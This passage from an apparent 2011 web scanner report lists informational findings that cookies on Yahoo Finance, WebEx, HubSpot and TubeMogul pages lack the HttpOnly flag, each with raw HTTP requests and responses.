The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webtrader2/servlet/login HTTP/1.1
Host: cwt1.interactivebrokers.com
Connection: keep-alive
Referer: http://www.interactivebrokers.com/en/p.php?f=customerService&ib_entity=llc
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ib=googlead; web=1059282; XYZAB_AM.LOGIN=; XYZAB=; URL_PARAM=actiongetProps=getProps&language=en&propFile=SSO_Login_v1

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:54:15 GMT
Server: apache
Content-Language: en
Set-Cookie: sk=value:ibg-dark; Expires=Thu, 08-Sep-2011 22:26:56 GMT; Secure
Content-Length: 14515
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns='http://www.w3.org/1999/xhtml'>

<head>


<!--
This software
...[SNIP]...

10.56. http://finance.yahoo.com/news/Pacer-Adds-LNG-Trucks-to-bw-1749635685.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /news/Pacer-Adds-LNG-Trucks-to-bw-1749635685.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/Pacer-Adds-LNG-Trucks-to-bw-1749635685.html HTTP/1.1
Host: finance.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:46:51 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: MwPhCom_degraded_status=false; path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 2
Connection: close
Server: YTS/1.20.7

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<title>Pacer Adds LNG Trucks to Southern California Operations - Yahoo! Finan
...[SNIP]...

10.57. http://finance.yahoo.com/news/Piedmont-Natural-Gas-prnews-2212692382.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /news/Piedmont-Natural-Gas-prnews-2212692382.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/Piedmont-Natural-Gas-prnews-2212692382.html HTTP/1.1
Host: finance.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:46:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: MwPhCom_degraded_status=false; path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 0
Connection: close
Server: YTS/1.20.7

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<title>Piedmont Natural Gas Announces 3rd Quarter 2011 Earnings Conference Ca
...[SNIP]...

10.58. http://finance.yahoo.com/news/Primary-Petroleum-Present-iw-1675004773.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /news/Primary-Petroleum-Present-iw-1675004773.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/Primary-Petroleum-Present-iw-1675004773.html HTTP/1.1
Host: finance.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:46:51 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: MwPhCom_degraded_status=false; path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 0
Connection: close
Server: YTS/1.20.7

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<title>Primary Petroleum to Present at Rodman &amp; Renshaw Annual Global Inv
...[SNIP]...

10.59. http://finance.yahoo.com/news/Retail-gasoline-prices-up-apf-2916275523.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /news/Retail-gasoline-prices-up-apf-2916275523.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/Retail-gasoline-prices-up-apf-2916275523.html HTTP/1.1
Host: finance.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:46:53 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: MwPhCom_degraded_status=false; path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 0
Connection: close
Server: YTS/1.20.7

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<title>Retail gasoline prices up penny in Texas - Yahoo! Finance</title>
<
...[SNIP]...

10.60. http://finance.yahoo.com/news/US-Steel-converts-vehicles-to-apf-2954052497.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /news/US-Steel-converts-vehicles-to-apf-2954052497.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/US-Steel-converts-vehicles-to-apf-2954052497.html HTTP/1.1
Host: finance.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:46:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: MwPhCom_degraded_status=false; path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 0
Connection: close
Server: YTS/1.20.7

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<title>US Steel converts vehicles to run on natural gas - Yahoo! Finance</tit
...[SNIP]...

10.61. https://icewebinar.webex.com/icewebinar/lsr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://icewebinar.webex.com
Path:   /icewebinar/lsr.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icewebinar/lsr.php HTTP/1.1
Host: icewebinar.webex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:45:21 GMT
Server: Apache
Set-Cookie: galaxye_wl=R2995082818; path=/
Cache-Control: no-cache
Pragma: No-cache
Content-Length: 771
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.4 JSP/2.0
Connection: close
Content-Type: text/html


<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="6">
<base href="https://icewebinar.webex.com/mw0306ld/mywebex/jsp/com
...[SNIP]...

10.62. https://interactivebrokers.webex.com/interactivebrokers/lsr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://interactivebrokers.webex.com
Path:   /interactivebrokers/lsr.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /interactivebrokers/lsr.php HTTP/1.1
Host: interactivebrokers.webex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:47:08 GMT
Server: Apache
Pragma: No-cache
Content-Length: 797
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: no-cache
Set-Cookie: NSC_kkkbwxm=0afc54500899;path=/
Connection: close
Content-Type: text/html


<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="5">
<base href="https://interactivebrokers.webex.com/mw0306lb/mywebex
...[SNIP]...

10.63. https://interactivebrokers.webex.com/interactivebrokers/onstage/g.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://interactivebrokers.webex.com
Path:   /interactivebrokers/onstage/g.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /interactivebrokers/onstage/g.php HTTP/1.1
Host: interactivebrokers.webex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 08 Sep 2011 19:47:08 GMT
Server: Apache
Pragma: No-cache
Location: https://interactivebrokers.webex.com/mw0306lb/mywebex/default.do?nomenu=true&siteurl=interactivebrokers&service=6&main_url=https%3A%2F%2Finteractivebrokers.webex.com%2Fec0605lb%2Feventcenter%2Fevent%2FeventAction.do%3FtheAction%3Ddetail%26confViewID%3D-1%26siteurl%3Dinteractivebrokers%26%26%26
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: no-cache
Set-Cookie: NSC_kkkbwxm=0afc54500899;path=/
Connection: close
Content-Type: text/html
Content-Length: 935

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://interactivebrokers.webex.c
...[SNIP]...

10.64. http://pfgbest.app5.hubspot.com/salog.js.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pfgbest.app5.hubspot.com
Path:   /salog.js.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salog.js.aspx HTTP/1.1
Host: pfgbest.app5.hubspot.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pfgbest.com/toolkit/

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 498
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=zAFaJjSNzQEkAAAAYzgwZmFjNzAtY2NhNi00Y2Q1LWIxYzktMWRhNDE1NmVlYzM10; expires=Fri, 07-Sep-2012 20:05:38 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=69bbab87-dff5-41d5-86c5-94506c2c7a5d; domain=pfgbest.app5.hubspot.com; expires=Wed, 08-Sep-2021 05:00:00 GMT; path=/; HttpOnly
Date: Thu, 08 Sep 2011 20:05:38 GMT
Set-Cookie: HUBSPOT159=219223212.0.0000; path=/


var hsUse20Servers = true;
var hsDayEndsIn = 28461;
var hsWeekEndsIn = 287661;
var hsMonthEndsIn = 1929261;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-09-08 16:05
...[SNIP]...

10.65. http://rcv-srv20.inplay.tubemogul.com/StreamReceiver/services  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rcv-srv20.inplay.tubemogul.com
Path:   /StreamReceiver/services

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /StreamReceiver/services HTTP/1.1
Host: rcv-srv20.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://www.viddler.com/player/cc4ac375/
Content-Length: 1000
Origin: http://ibkb.interactivebrokers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: text/xml; charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517; _tmpd=MjAxMTA5MDg_ODpzZWdtZW50PTAwMCZ6aXA9JmFnZT0mZ2VuZGVyPTozMA

<?xml version="1.0" encoding="utf-8"?><StreamMiner xmlns="http://www.illumenix.com/StreamReceiver/services/schemas" xsi:schemaLocation="http://www.illumenix.com/StreamReceiver/services/schemas streamm
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: _tmpi=MjAxMTA5MDg_MjotNTY3NTYzMzQyMTY5OTg1NzUxNzozMHwxNDotNTY3NTYzMzQyMTY5OTg1NzUxNzozMA; Domain=.tubemogul.com; Expires=Fri, 07-Sep-2012 19:54:09 GMT; Path=/
Content-Type: application/xml
Date: Thu, 08 Sep 2011 19:54:08 GMT
Connection: close
Content-Length: 1334

<?xml version="1.0" encoding="UTF-8" standalone="no"?><StreamMiner xmlns="http://www.illumenix.com/StreamReceiver/services/schemas" version="2"><Response><PlayerUpdateResponse requestStatus="success"/
...[SNIP]...

10.66. http://receive.inplay.tubemogul.com/StreamReceiver/demo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://receive.inplay.tubemogul.com
Path:   /StreamReceiver/demo

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /StreamReceiver/demo?segment=000&zip=&age=&gender= HTTP/1.1
Host: receive.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://www.viddler.com/player/cc4ac375/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: _tmpd=MjAxMTA5MDg_ODpzZWdtZW50PTAwMCZ6aXA9JmFnZT0mZ2VuZGVyPTozMA; Domain=.tubemogul.com; Expires=Fri, 07-Sep-2012 19:54:09 GMT; Path=/
P3P: cp="NOI DSP COR LAW PSAo PSDo IVAo IVDo OUR BUS UNI DEM"
host: rcv-srv04
Content-Type: image/gif
Content-Length: 43
Date: Thu, 08 Sep 2011 19:54:08 GMT
Connection: close

GIF89a.............!.......,...........D..;

10.67. http://rtd.tubemogul.com/upi/pid/5w3jqr4k  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rtd.tubemogul.com
Path:   /upi/pid/5w3jqr4k

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /upi/pid/5w3jqr4k?puid=E1&tmid=-5675633421699857517 HTTP/1.1
Host: rtd.tubemogul.com
Proxy-Co